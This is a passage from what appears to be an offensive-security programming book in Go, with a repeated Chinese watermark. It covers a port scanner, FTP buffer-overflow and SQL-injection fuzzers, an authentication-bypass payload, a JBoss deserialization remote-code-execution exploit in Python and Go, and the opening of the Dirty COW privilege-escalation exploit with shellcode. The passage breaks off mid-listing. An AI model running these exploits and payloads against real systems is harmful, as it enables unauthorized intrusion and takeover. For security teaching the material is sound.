responding. SYN-flood protections generally won’t exchange packets beyond the initial three-way handshake unless a service is listening, so the presence of any additional packets might indicate that a service exists. Checking TCP Flags To account for SYN cookies, you have to extend your port-scanning capa- bilities to look beyond the three-way handshake by checking to see whether 前沿信安资讯阵地 公众号:i nf osrc Raw Packet Processing 181 you receive any additional packets from the target after you’ve established a connection. You can accomplish this by sniffing the packets to see if any of them were transmitted with a TCP flag value indicative of additional, legiti- mate service communications. TCP flags indicate information about the state of a packet transfer. If you look at the TCP specification, you’ll find that the flags are stored in a single byte at position 14 in the packet’s header. Each bit of this byte repre- sents a single flag value. The flag is “on” if the bit at that position is set to 1, and “off” if the bit is set to 0. Table 8-1 shows the positions of the flags in the byte, as per the TCP specification. Table 8-1: TCP Flags and Their Byte Positions Bit 7 6 5 4 3 2 1 0 Flag CWR ECE URG ACK PSH RST SYN FIN Once you know the positions of the flags you care about, you can create a filter that checks them. For example, you can look for packets containing the following flags, which might indicate a listening service: • ACK and FIN • ACK • ACK and PSH Because you have the ability to capture and filter certain packets by using the gopacket library, you can build a utility that attempts to connect to a remote service, sniffs the packets, and displays only the services that com- municate packets with these TCP headers. Assume all other services are falsely “open” because of SYN cookies. Building the BPF Filter Your BPF filter needs to check for the specific flag values that indicate packet transfer. The flag byte has the following values if the flags we mentioned earlier are turned on: • ACK and FIN: 00010001 (0x11) • ACK: 00010000 (0x10) • ACK and PSH: 00011000 (0x18) We included the hex equivalent of the binary value for clarity, as you’ll use the hex value in your filter. To summarize, you need to check the 14th byte (offset 13 for a 0-based index) of the TCP header, filtering only for packets whose flags are 0x11, 0x10, or 0x18. Here’s what the BPF filter looks like: tcp[13] == 0x11 or tcp[13] == 0x10 or tcp[13] == 0x18 Excellent. You have your filter. 前沿信安资讯阵地 公众号:i nf osrc 182 Chapter 8 Writing the Port Scanner Now you’ll use the filter to build a utility that establishes a full TCP connec- tion and inspects packets beyond the three-way handshake to see whether other packets are transmitted, indicating that an actual service is listening. The program is shown in Listing 8-6. For the sake of simplicity, we’ve opted to not optimize the code for efficiency. However, you can greatly improve this code by making optimizations similar to those we made in Chapter 2. var ( u snaplen = int32(320) promisc = true timeout = pcap.BlockForever filter = "tcp[13] == 0x11 or tcp[13] == 0x10 or tcp[13] == 0x18" devFound = false results = make(map[string]int) ) func capture(iface, target string) { v handle, err := pcap.OpenLive(iface, snaplen, promisc, timeout) if err != nil { log.Panicln(err) } defer handle.Close() if err := handle.SetBPFFilter(filter); err != nil { log.Panicln(err) } source := gopacket.NewPacketSource(handle, handle.LinkType()) fmt.Println("Capturing packets") for packet := range source.Packets() { networkLayer := packet.NetworkLayer() w if networkLayer == nil { continue } transportLayer := packet.TransportLayer() if transportLayer == nil { continue } srcHost := networkLayer.NetworkFlow().Src().String() x srcPort := transportLayer.TransportFlow().Src().String() if srcHost != target { y continue } results[srcPort] += 1 z } } 前沿信安资讯阵地 公众号:i nf osrc Raw Packet Processing 183 func main() { if len(os.Args) != 4 { log.Fatalln("Usage: main.go <capture_iface> <target_ip> <port1,port2,port3>") } devices, err := pcap.FindAllDevs() if err != nil { log.Panicln(err) } iface := os.Args[1] for _, device := range devices { if device.Name == iface { devFound = true } } if !devFound { log.Panicf("Device named '%s' does not exist\n", iface) } ip := os.Args[2] go capture(iface, ip) { time.Sleep(1 * time.Second) ports, err := explode(os.Args[3]) if err != nil { log.Panicln(err) } for _, port := range ports { | target := fmt.Sprintf("%s:%s", ip, port) fmt.Println("Trying", target) c, err := net.DialTimeout("tcp", target, 1000*time.Millisecond) } if err != nil { continue } c.Close() } time.Sleep(2 * time.Second) for port, confidence := range results { ~ if confidence >= 1 { fmt.Printf("Port %s open (confidence: %d)\n", port, confidence) } } } /* Extraneous code omitted for brevity */ Listing 8-6: Scanning and processing packets with SYN-flood protections (/ch-8 /syn-flood/main.go) 前沿信安资讯阵地 公众号:i nf osrc 184 Chapter 8 Broadly speaking, your code will maintain a count of packets, grouped by port, to represent how confident you are that the port is indeed open. You’ll use your filter to select only packets with the proper flags set. The greater the count of matching packets, the higher your confidence that the service is listening on the port. Your code starts by defining several variables for use throughout u. These variables include your filter and a map named results that you’ll use to track your level of confidence that the port is open. You’ll use target ports as keys and maintain a count of matching packets as the map value. Next you define a function, capture(), that accepts the interface name and target IP for which you’re testing v. The function itself bootstraps the packet capture much in the same way as previous examples. However, you must use different code to process each packet. You leverage the gopacket functionality to extract the packet’s network and transport layers w. If either of these layers is absent, you ignore the packet; that’s because the next step is to inspect the source IP and port of the packet x, and if there’s no transport or network layer, you won’t have that information. You then confirm that the packet source matches the IP address that you’re target- ing y. If the packet source and IP address don’t match, you skip further processing. If the packet’s source IP and port match your target, you incre- ment your confidence level for the port z. Repeat this process for each sub- sequent packet. Each time you get a match, your confidence level increases. In your main() function, use a goroutine to call your capture() function {. Using a goroutine ensures that your packet capture and processing logic runs concurrently without blocking. Meanwhile, your main() function pro- ceeds to parse your target ports, looping through them one by one | and calling net.DialTimeout to attempt a TCP connection against each }. Your goroutine is running, actively watching these connection attempts, looking for packets that indicate a service is listening. After you’ve attempted to connect to each port, process all of your results by displaying only those ports that have a confidence level of 1 or more (meaning at least one packet matches your filter for that port) ~. The code includes several calls to time.Sleep() to ensure you’re leaving adequate time to set up the sniffer and process packets. Let’s look at a sample run of the program, shown in Listing 8-7. $ go build -o syn-flood && sudo ./syn-flood enp0s5 80,443,8123,65530 Capturing packets Trying Trying Trying Trying Port 80 open (confidence: 1) Port 443 open (confidence: 1) Listing 8-7: Port-scanning results with confidence ratings 前沿信安资讯阵地 公众号:i nf osrc Raw Packet Processing 185 The test successfully determines that both port 80 and 443 are open. It also confirms that no service is listening on ports 8123 and 65530. (Note that we’ve changed the IP address in the example to protect the innocent.) You could improve the code in several ways. As learning exercises, we challenge you to add the following enhancements: 1. Remove the network and transport layer logic and source checks from the capture() function. Instead, add additional parameters to the BPF filter to ensure that you capture only packets from your target IP and ports. 2. Replace the sequential logic of port scanning with a concurrent alter- native, similar to what we demonstrated in previous chapters. This will improve efficiency. 3. Rather than limiting the code to a single target IP, allow the user to supply a list of IPs or network blocks. Summary We’ve completed our discussion of packet captures, focusing primarily on passive sniffing activities. In the next chapter, we’ll focus on exploit development. 前沿信安资讯阵地 公众号:i nf osrc 前沿信安资讯阵地 公众号:i nf osrc 9 W R I T ING A N D P OR T ING E X PL O I T CODE In the majority of the previous chapters, you used Go to create network-based attacks. You’ve explored raw TCP, HTTP, DNS, SMB, database interaction, and passive packet capturing. This chapter focuses instead on identifying and exploiting vulnerabili- ties. First, you’ll learn how to create a vulnerability fuzzer to discover an application’s security weaknesses. Then you’ll learn how to port existing exploits to Go. Finally, we’ll show you how to use popular tools to create Go-friendly shellcode. By the end of the chapter, you should have a basic understanding of how to use Go to discover flaws while also using it to write and deliver various payloads. 前沿信安资讯阵地 公众号:i nf osrc 188 Chapter 9 Creating a Fuzzer Fuzzing is a technique that sends extensive amounts of data to an applica- tion in an attempt to force the application to produce abnormal behavior. This behavior can reveal coding errors or security deficiencies, which you can later exploit. Fuzzing an application can also produce undesirable side effects, such as resource exhaustion, memory corruption, and service interruption. Some of these side effects are necessary for bug hunters and exploit developers to do their jobs but bad for the stability of the application. Therefore, it’s crucial that you always perform fuzzing in a controlled lab environment. As with most of the techniques we discuss in this book, don’t fuzz applications or systems without explicit authorization from the owner. In this section, you’ll build two fuzzers. The first will check the capacity of an input in an attempt to crash a service and identify a buffer overflow. The second fuzzer will replay an HTTP request, cycling through potential input values to detect SQL injection. Buffer Overflow Fuzzing Buffer overflows occur when a user submits more data in an input than the application has allocated memory space for. For example, a user could submit 5,000 characters when the application expects to receive only 5. If a program uses the wrong techniques, this could allow the user to write that surplus data to parts of memory that aren’t intended for that purpose. This “overflow” cor- rupts the data stored within adjacent memory locations, allowing a malicious user to potentially crash the program or alter its logical flow. Buffer overflows are particularly impactful for network-based programs that receive data from clients. Using buffer overflows, a client can disrupt server availability or possibly achieve remote code execution. It’s worth restating: don’t fuzz systems or applications unless you are permitted to do so. In addition, make sure you fully understand the consequences of crashing the system or service. How Buffer Overflow Fuzzing Works Fuzzing to create a buffer overflow generally involves submitting increas- ingly longer inputs, such that each subsequent request includes an input value whose length is one character longer than the previous attempt. A contrived example using the A character as input would execute according to the pattern shown in Table 9-1. By sending numerous inputs to a vulnerable function, you’ll eventually reach a point where the length of your input exceeds the function’s defined buffer size, which will corrupt the program’s control elements, such as its return and instruction pointers. At this point, the application or system will crash. By sending incrementally larger requests for each attempt, you can pre- cisely determine the expected input size, which is important for exploiting the application later. You can then inspect the crash or resulting core dump 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 189 to better understand the vulnerability and attempt to develop a working exploit. We won’t go into debugger usage and exploit development here; instead, let’s focus on writing the fuzzer. Table 9-1: Input Values in a Buffer Overflow Test Attempt Input value 1 A 2 AA 3 AAA 4 AAAA N A repeated N times If you’ve done any manual fuzzing using modern, interpreted languages, you’ve probably used a construct to create strings of specific lengths. For example, the following Python code, run within the interpreter console, shows how simple it is to create a string of 25 A characters: >>> x = "A"*25 >>> x 'AAAAAAAAAAAAAAAAAAAAAAAAA' Unfortunately, Go has no such construct to conveniently build strings of arbitrary length. You’ll have to do that the old-fashioned way—using a loop—which would look something like this: var ( n int s string ) for n = 0; n < 25; n++ { s += "A" } Sure, it’s a little more verbose than the Python alternative, but not overwhelming. The other consideration you’ll need to make is the delivery mechanism for your payload. This will depend on the target application or system. In some instances, this could involve writing a file to a disk. In other cases, you might communicate over TCP/UDP with an HTTP, SMTP, SNMP, FTP, Telnet, or other networked service. In the following example, you’ll perform fuzzing against a remote FTP server. You can tweak a lot of the logic we present fairly quickly to operate against other protocols, so it should act as a good basis for you to develop custom fuzzers against other services. Although Go’s standard packages include support for some common protocols, such as HTTP and SMTP, they don’t include support for client- server FTP interactions. Instead, you could use a third-party package that 前沿信安资讯阵地 公众号:i nf osrc 190 Chapter 9 already performs FTP communications, so you don’t have to reinvent the wheel and write something from the ground up. However, for maximum control (and to appreciate the protocol), you’ll instead build the basic FTP functionality using raw TCP communications. If you need a refresher on how this works, refer to Chapter 2. Building The Buffer Overflow Fuzzer Listing 9-1 shows the fuzzer code. (All the code listings at the root location of / exist under the provided github repo https://github.com/blackhat-go/ bhg/.) We’ve hardcoded some values, such as the target IP and port, as well as the maximum length of your input. The code itself fuzzes the USER prop- erty. Since this property occurs before a user is authenticated, it represents a commonly testable point on the attack surface. You could certainly extend this code to test other pre-authentication commands, such as PASS, but keep in mind that if you supply a legitimate username and then keep submitting inputs for PASS, you might get locked out eventually. func main() { u for i := 0; i < 2500; i++ { v conn, err := net.Dial("tcp", "") if err != nil { w log.Fatalf("[!] Error at offset %d: %s\n", i, err) } x bufio.NewReader(conn).ReadString('\n') user := "" y for n := 0; n <= i; n++ { user += "A" } raw := "USER %s\n" z fmt.Fprintf(conn, raw, user) bufio.NewReader(conn).ReadString('\n') raw = "PASS password\n" fmt.Fprint(conn, raw) bufio.NewReader(conn).ReadString('\n') if err := conn.Close(){; err != nil { | log.Println("[!] Error at offset %d: %s\n", i, err) } } } Listing 9-1: A buffer overflow fuzzer (/ch-9/ftp-fuzz /main.go) The code is essentially one large loop, beginning at u. Each time the program loops, it adds another character to the username you’ll supply. In this case, you’ll send usernames from 1 to 2,500 characters in length. For each iteration of the loop, you establish a TCP connection to the destination FTP server v. Any time you interact with the FTP service, 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 191 whether it’s the initial connection or the subsequent commands, you explicitly read the response from the server as a single line x. This allows the code to block while waiting for the TCP responses so you don’t send your commands prematurely, before packets have made their round trip. You then use another for loop to build the string of As in the manner we showed previously y. You use the index i of the outer loop to build the string length dependent on the current iteration of the loop, so that it increases by one each time the program starts over. You use this value to write the USER command by using fmt.Fprintf(conn, raw, user) z. Although you could end your interaction with the FTP server at this point (after all, you’re fuzzing only the USER command), you proceed to send the PASS command to complete the transaction. Lastly, you close your connection cleanly {. It’s worth noting that there are two points, w and |, where abnormal connectivity behavior could indicate a service disruption, implying a poten- tial buffer overflow: when the connection is first established and when the connection closes. If you can’t establish a connection the next time the pro- gram loops, it’s likely that something went wrong. You’ll then want to check whether the service crashed as a result of a buffer overflow. If you can’t close a connection after you’ve established it, this may indicate the abnormal behavior of the remote FTP service abruptly discon- necting, but it probably isn’t caused by a buffer overflow. The anomalous condition is logged, but the program will continue. A packet capture, illustrated in Figure 9-1, shows that each subsequent USER command grows in length, confirming that your code works as desired. Figure 9-1: A Wireshark capture depicting the USER command growing by one letter each time the program loops You could improve the code in several ways for flexibility and conve- nience. For example, you’d probably want to remove the hardcoded IP, port, and iteration values, and instead include them via command line arguments or a configuration file. We invite you to perform these usability updates as an exercise. Furthermore, you could extend the code so it fuzzes commands after authentication. Specifically, you could update the tool to fuzz the CWD/CD command. Various tools have historically been susceptible 前沿信安资讯阵地 公众号:i nf osrc 192 Chapter 9 to buffer overflows related to the handling of this command, making it a good target for fuzzing. SQL Injection Fuzzing In this section, you’ll explore SQL injection fuzzing. Instead of changing the length of each input, this variation on the attack cycles through a defined list of inputs to attempt to cause SQL injection. In other words, you’ll fuzz the username parameter of a website login form by attempting a list of inputs consisting of various SQL meta-characters and syntax that, if handled insecurely by the backend database, will yield abnormal behavior by the application. To keep things simple, you’ll be probing only for error-based SQL injec- tion, ignoring other forms, such as boolean-, time-, and union-based. That means that instead of looking for subtle differences in response content or response time, you’ll look for an error message in the HTTP response to indicate a SQL injection. This implies that you expect the web server to remain operational, so you can no longer rely on connection establish- ment as a litmus test for whether you’ve succeeded in creating abnormal behavior. Instead, you’ll need to search the response body for a database error message. How SQL Injection Works At its core, SQL injection allows an attacker to insert SQL meta-characters into a statement, potentially manipulating the query to produce unintended behavior or return restricted, sensitive data. The problem occurs when developers blindly concatenate untrusted user data to their SQL queries, as in the following pseudocode: username = HTTP_GET["username"] query = "SELECT * FROM users WHERE user = '" + username + "'" result = db.execute(query) if(len(result) > 0) { return AuthenticationSuccess() } else { return AuthenticationFailed() } In our pseudocode, the username variable is read directly from an HTTP parameter. The value of the username variable isn’t sanitized or validated. You then build a query string by using the value, concatenating it onto the SQL query syntax directly. The program executes the query against the database and inspects the result. If it finds at least one match- ing record, you’d consider the authentication successful. The code should behave appropriately so long as the supplied username consists of alpha- numeric and a certain subset of special characters. For example, supplying a username of alice results in the following safe query: SELECT * FROM users WHERE user = 'alice' 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 193 However, what happens when the user supplies a username containing an apostrophe? Supplying a username of o'doyle produces the following query: SELECT * FROM users WHERE user = 'o'doyle' The problem here is that the backend database now sees an unbalanced number of single quotation marks. Notice the emphasized portion of the preceding query, doyle; the backend database interprets this as SQL syntax, since it’s outside the enclosing quotes. This, of course, is invalid SQL syn- tax, and the backend database won’t be able to process it. For error-based SQL injection, this produces an error message in the HTTP response. The message itself will vary based on the database. In the case of MySQL, you’ll receive an error similar to the following, possibly with additional details dis- closing the query itself: You have an error in your SQL syntax Although we won’t go too deeply into exploitation, you could now manipulate the username input to produce a valid SQL query that would bypass the authentication in our example. The username input ' OR 1=1# does just that when placed in the following SQL statement: SELECT * FROM users WHERE user = '' OR 1=1#' This input appends a logical OR onto the end of the query. This OR state- ment always evaluates to true, because 1 always equals 1. You then use a MySQL comment (#) to force the backend database to ignore the remain- der of the query. This results in a valid SQL statement that, assuming one or more rows exist in the database, you can use to bypass authentication in the preceding pseudocode example. Building the SQL Injection Fuzzer The intent of your fuzzer won’t be to generate a syntactically valid SQL statement. Quite the opposite. You’ll want to break the query such that the malformed syntax yields an error by the backend database, as the O’Doyle example just demonstrated. For this, you’ll send various SQL meta-characters as input. The first order of business is to analyze the target request. By inspecting the HTML source code, using an intercepting proxy, or capturing network packets with Wireshark, you determine that the HTTP request submitted for the login portal resembles the following: POST /WebApplication/login.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded 前沿信安资讯阵地 公众号:i nf osrc 194 Chapter 9 Content-Length: 35 Referer: Cookie: JSESSIONID=2D55A87C06A11AAE732A601FCB9DE571 Connection: keep-alive Upgrade-Insecure-Requests: 1 username=someuser&password=somepass The login form sends a POST request to /WebApplication/login.jsp. There are two form parameters: username and password. For this example, we’ll limit the fuzzing to the username field for brevity. The code itself is fairly compact, consisting of a few loops, some regular expressions, and the creation of an HTTP request. It’s shown in Listing 9-2. func main() { u payloads := []string{ "baseline", ")", "(", "\"", "'", } v sqlErrors := []string{ "SQL", "MySQL", "ORA-", "syntax", } errRegexes := []*regexp.Regexp{} for _, e := range sqlErrors { w re := regexp.MustCompile(fmt.Sprintf(".*%s.*", e)) errRegexes = append(errRegexes, re) } x for _, payload := range payloads { client := new(http.Client) y body := []byte(fmt.Sprintf("username=%s&password=p", payload)) z req, err := http.NewRequest( "POST", "", bytes.NewReader(body), ) if err != nil { log.Fatalf("[!] Unable to generate request: %s\n", err) } req.Header.Add("Content-Type", "application/x-www-form-urlencoded") resp, err := client.Do(req) if err != nil { log.Fatalf("[!] Unable to process response: %s\n", err) } 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 195 { body, err = ioutil.ReadAll(resp.Body) if err != nil { log.Fatalf("[!] Unable to read response body: %s\n", err) } resp.Body.Close() | for idx, re := range errRegexes { } if re.MatchString(string(body)) { fmt.Printf( "[+] SQL Error found ('%s') for payload: %s\n", sqlErrors[idx], payload, ) break } } } } Listing 9-2: A SQL injection fuzzer (/ch-9/http_fuzz /main.go) The code begins by defining a slice of payloads you want to attempt u. This is your fuzzing list that you’ll supply later as the value of the username request parameter. In the same vein, you define a slice of strings that repre- sent keywords within an SQL error message v. These will be the values you’ll search for in the HTTP response body. The presence of any of these values is a strong indicator that an SQL error message is present. You could expand on both of these lists, but they’re adequate datasets for this example. Next, you perform some preprocessing work. For each of the error key- words you wish to search for, you build and compile a regular expression w. You do this work outside your main HTTP logic so you don’t have to create and compile these regular expressions multiple times, once for each payload. A minor optimization, no doubt, but good practice nonetheless. You’ll use these compiled regular expressions to populate a separate slice for use later. Next comes the core logic of the fuzzer. You loop through each of the payloads x, using each to build an appropriate HTTP request body whose username value is your current payload y. You use the resulting value to build an HTTP POST request z, targeting your login form. You then set the Content-Type header and send the request by calling client.Do(req). Notice that you send the request by using the long-form process of creating a client and an individual request and then calling client.Do(). You certainly could have used Go’s http.PostForm() function to achieve the same behavior more concisely. However, the more verbose technique gives you more granular control over HTTP header values. Although in this example you’re setting only the Content-Type header, it’s not uncommon to set addi- tional header values when making HTTP requests (such as User-Agent, Cookie, and others). You can’t do this with http.PostForm(), so going the long route will make it easier to add any necessary HTTP headers in the future, par- ticularly if you’re ever interested in fuzzing the headers themselves. 前沿信安资讯阵地 公众号:i nf osrc 196 Chapter 9 Next, you read the HTTP response body by using ioutil.ReadAll() {. Now that you have the body, you loop through all of your precompiled regular expressions |, testing the response body for the presence of your SQL error keywords }. If you get a match, you probably have a SQL injec- tion error message. The program will log details of the payload and error to the screen and move onto the next iteration of the loop. Run your code to confirm that it successfully identifies a SQL injection flaw in a vulnerable login form. If you supply the username value with a single quotation mark, you’ll get the error indicator SQL, as shown here: $ go run main.go [+] SQL Error found ('SQL') for payload: ' We encourage you to try the following exercises to help you better understand the code, appreciate the nuances of HTTP communications, and improve your ability to detect SQL injection: 1. Update the code to test for time-based SQL injection. To do this, you’ll have to send various payloads that introduce a time delay when the backend query executes. You’ll need to measure the round-trip time and compare it against a baseline request to deduce whether SQL injection is present. 2. Update the code to test for boolean-based blind SQL injection. Although you can use different indicators for this, a simple way is to compare the HTTP response code against a baseline response. A deviation from the baseline response code, particularly receiving a response code of 500 (internal server error), may be indicative of SQL injection. 3. Rather than relying on Go’s net.http package to facilitate communica- tions, try using the net package to dial a raw TCP connection. When using the net package, you’ll need to be aware of the Content-Length HTTP header, which represents the length of the message body. You’ll need to calculate this length correctly for each request because the body length may change. If you use an invalid length value, the server will likely reject the request. In the next section, we’ll show you how to port exploits to Go from other languages, such as Python or C. Porting Exploits to Go For various reasons, you may want to port an existing exploit to Go. Perhaps the existing exploit code is broken, incomplete, or incompatible with the system or version you wish to target. Although you could certainly extend or update the broken or incomplete code using the same language with which it was created, Go gives you the luxury of easy cross-compilation, consistent syntax and indentation rules, and a powerful standard library. All of this will make your exploit code arguably more portable and readable without compromising on features. 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 197 Likely the most challenging task when porting an existing exploit is determining the equivalent Go libraries and function calls to achieve the same level of functionality. For example, addressing endianness, encoding, and encryption equivalents may take a bit of research, particularly for those who aren’t well versed in Go. Fortunately, we’ve addressed the complexity of network-based communications in previous chapters. The implementations and nuances of this should, hopefully, be familiar. You’ll find countless ways to use Go’s standard packages for exploit development or porting. While it’s unrealistic for us to comprehensively cover these packages and use cases in a single chapter, we encourage you to explore Go’s official documentation at https://golang.org/pkg/. The docu- mentation is extensive, with an abundance of good examples to help you understand function and package usage. Here are just a few of the packages that will likely be of greatest interest to you when working with exploitation: bytes Provides low-level byte manipulation crypto Implements various symmetric and asymmetric ciphers and message authentication debug Inspects various file type metadata and contents encoding Encodes and decodes data by using various common forms such as binary, Hex, Base64, and more io and bufio Reads and writes data from and to various common interface types including the file system, standard output, network connections, and more net Facilitates client-server interaction by using various protocols such as HTTP and SMTP os Executes and interacts with the local operating system syscall Exposes an interface for making low-level system calls unicode Encodes and decodes data by using UTF-16 or UTF-8 unsafe Useful for avoiding Go’s type safety checks when interacting with the operating system Admittedly, some of these packages will prove to be more useful in later chapters, particularly when we discuss low-level Windows interactions, but we’ve included this list for your awareness. Rather than trying to cover these packages in detail, we’ll show you how to port an existing exploit by using some of these packages. Porting an Exploit from Python In this first example, you’ll port an exploit of the Java deserialization vul- nerability released in 2015. The vulnerability, categorized under several CVEs, affects the deserialization of Java objects in common applications, servers, and libraries.1 This vulnerability is introduced by a deserialization 1. For more detailed information about this vulnerability, refer to https://foxglovesecurity.com /2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in -common-this-vulnerability/#jboss. 前沿信安资讯阵地 公众号:i nf osrc 198 Chapter 9 library that doesn’t validate input prior to server-side execution (a com- mon cause of vulnerabilities). We’ll narrow our focus to exploiting JBoss, a popular Java Enterprise Edition application server. At https://github.com /roo7break/serialator/blob/master/serialator.py, you’ll find a Python script that contains logic to exploit the vulnerability in multiple applications. Listing 9-3 provides the logic you’ll replicate. def jboss_attack(HOST, PORT, SSL_On, _cmd): # The below code is based on the jboss_java_serialize.nasl script within Nessus """ This function sets up the attack payload for JBoss """ body_serObj = hex2raw3("ACED000573720032737--SNIPPED FOR BREVITY--017400") u cleng = len(_cmd) body_serObj += chr(cleng) + _cmd v body_serObj += hex2raw3("740004657865637571--SNIPPED FOR BREVITY--7E003A") w if SSL_On: x webservice = httplib2.Http(disable_ssl_certificate_validation=True) URL_ADDR = "%s://%s:%s" % ('https',HOST,PORT) else: webservice = httplib2.Http() URL_ADDR = "%s://%s:%s" % ('http',HOST,PORT) headers = {"User-Agent":"JBoss_RCE_POC", y "Content-type":"application/x-java-serialized-object--SNIPPED FOR BREVITY--", "Content-length":"%d" % len(body_serObj) } resp, content = webservice.requestz ( URL_ADDR+"/invoker/JMXInvokerServlet", "POST", body=body_serObj, headers=headers) # print provided response. print("[i] Response received from target: %s" % resp) Listing 9-3: The Python serialization exploit code Let’s take a look at what you’re working with here. The function receives a host, port, SSL indicator, and operating system command as parameters. To build the proper request, the function has to create a payload that rep- resents a serialized Java object. This script starts by hardcoding a series of bytes onto a variable named body_serObj u. These bytes have been snipped for brevity, but notice they are represented in the code as a string value. This is a hexadecimal string, which you’ll need to convert to a byte array so that two characters of the string become a single byte representation. For example, you’ll need to convert AC to the hexadecimal byte \xAC. To accomplish this conversion, the exploit code calls a function named hex2raw3. Details of this function’s underlying implementation are inconsequential, so long as you understand what’s happening to the hexadecimal string. 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 199 Next, the script calculates the length of the operating system command, and then appends the length and command to the body_serObj variable v. The script completes the construction of the payload by appending addi- tional data that represents the remainder of your Java serialized object in a format that JBoss can process w. Once the payload is constructed, the script builds the URL and sets up SSL to ignore invalid certificates, if necessary x. It then sets the required Content-Type and Content-Length HTTP headers y and sends the malicious request to the target server z. Most of what’s presented in this script shouldn’t be new to you, as we’ve covered the majority of it in previous chapters. It’s now just a matter of mak- ing the equivalent function calls in a Go friendly manner. Listing 9-4 shows the Go version of the exploit. func jboss(host string, ssl bool, cmd string) (int, error) { serializedObject, err := hex.DecodeString("ACED0005737--SNIPPED FOR BREVITY--017400") u if err != nil { return 0, err } serializedObject = append(serializedObject, byte(len(cmd))) serializedObject = append(serializedObject, []byte(cmd)...) v afterBuf, err := hex.DecodeString("740004657865637571--SNIPPED FOR BREVITY--7E003A") w if err != nil { return 0, err } serializedObject = append(serializedObject, afterBuf...) var client *http.Client var url string if ssl { x client = &http.Client{ Transport: &http.Transport{ TLSClientConfig: &tls.Config{ InsecureSkipVerify: true, }, }, } url = fmt.Sprintf("https://%s/invoker/JMXInvokerServlet", host) } else { client = &http.Client{} url = fmt.Sprintf("http://%s/invoker/JMXInvokerServlet", host) } req, err := http.NewRequest("POST", url, bytes.NewReader(serializedObject)) if err != nil { return 0, err } req.Header.Set( y "User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko") req.Header.Set( "Content-Type", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue") 前沿信安资讯阵地 公众号:i nf osrc 200 Chapter 9 resp, err := client.Do(req) z if err != nil { return 0, err } return resp.StatusCode, nil } Listing 9-4: The Go equivalent of the original Python serialization exploit (/ch-9 /jboss/main.go) The code is nearly a line-by-line reproduction of the Python version. For this reason, we’ve set the annotations to align with their Python coun- terparts, so you’ll be able to follow the changes we’ve made. First, you construct your payload by defining your serialized Java object byte slice u, hardcoding the portion before your operating system com- mand. Unlike the Python version, which relied on user-defined logic to convert your hexadecimal string to a byte array, the Go version uses the hex.DecodeString() from the encoding/hex package. Next, you determine the length of your operating system command, and then append it and the command itself to your payload v. You complete the construction of your payload by decoding your hardcoded hexadecimal trailer string onto your existing payload w. The code for this is slightly more verbose than the Python version because we intentionally added in additional error handling, but it’s also able to use Go’s standard encoding package to easily decode your hexadecimal string. You proceed to initialize your HTTP client x, configuring it for SSL communications if requested, and then build a POST request. Prior to sending the request, you set your necessary HTTP headers y so that the JBoss server interprets the content type appropriately. Notice that you don’t explicitly set the Content-Length HTTP header. That’s because Go’s http pack- age does that for you automatically. Finally, you send your malicious request by calling client.Do(req) z. For the most part, this code makes use of what you’ve already learned. The code introduces small modifications such as configuring SSL to ignore invalid certificates x and adding specific HTTP headers y. Perhaps the one novel element in our code is the use of hex.DecodeString(), which is a Go core function that translates a hexadecimal string to its equivalent byte representation. You’d have to do this manually in Python. Table 9-2 shows some additional, commonly encountered Python functions or constructs with their Go equivalents. This is not a comprehensive list of functional mappings. Too many variations and edge cases exist to cover all the possible functions required for porting exploits. We’re hopeful that this will help you translate at least some of the most common Python functions to Go. 前沿信安资讯阵地 公众号:i nf osrc Writing and Porting Exploit Code 201 Table 9-2: Common Python Functions and Their Go Equivalents Python Go Notes hex(x) fmt.Sprintf("%#x", x) Converts an integer, x, to a lowercase hexadecimal string, prefixed with "0x". ord(c) rune(c) Used to retrieve the integer (int32) value of a single character. Works for standard 8-bit strings or multibyte Unicode. Note that rune is a built-in type in Go and makes working with ASCII and Unicode data fairly simple. chr(i) and unichr(i) fmt.Sprintf("%+q", rune(i)) The inverse of ord in Python, chr and unichr return a string of length 1 for the integer input. In Go, you use the rune type and can retrieve it as a string by using the %+q format sequence. struct.pack(fmt, v1, v2, . . .) binary.Write(. . .) Creates a binary representation of the data, formatted appropriately for type and endianness. struct.unpack(fmt, string) binary.Read(. . .) The inverse of struct.pack and binary. Write. Reads structured binary data into a specified format and type. Porting an Exploit from C Let’s step away from Python and focus on C. C is arguably a less readable language than Python, yet C shares more similarities with Go than Python does. This makes porting exploits from C easier than you might think. To demonstrate, we’ll be porting a local privilege escalation exploit for Linux. The vulnerability, dubbed Dirty COW, pertains to a race condition within the Linux kernel’s memory subsystem. This flaw affected most, if not all, common Linux and Android distributions at the time of disclosure. The vulnerability has since been patched, so you’ll need to take some specific measures to reproduce the examples that follow. Specifically, you’ll need to configure a Linux system with a vulnerable kernel version. Setting this up is beyond the scope of the chapter; however, for reference, we use a 64-bit Ubuntu 14.04 LTS distribution with kernel version 3.13.1. Several variations of the exploit are publicly available. You can find the one we intend to replicate at https://www.exploit-db.com/exploits/40616/. Listing 9-5 shows the original exploit code, slightly modified for readability, in its entirety. #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <fcntl.h> #include <pthread.h> #include <string.h> #include <unistd.h> 前沿信安资讯阵地 公众号:i nf osrc 202 Chapter 9 void *map; int f; int stop = 0; struct stat st; char *name; pthread_t pth1,pth2,pth3; // change if no permissions to read char suid_binary[] = "/usr/bin/passwd"; unsigned char sc[] = { 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, --snip-- 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 }; unsigned int sc_len = 177; void *madviseThread(void *arg) { char *str; str=(char*)arg; int i,c=0; for(i=0;i<1000000 && !stop;i++) { c+=madvise(map,100,MADV_DONTNEED); } printf("thread stopped\n"); } void 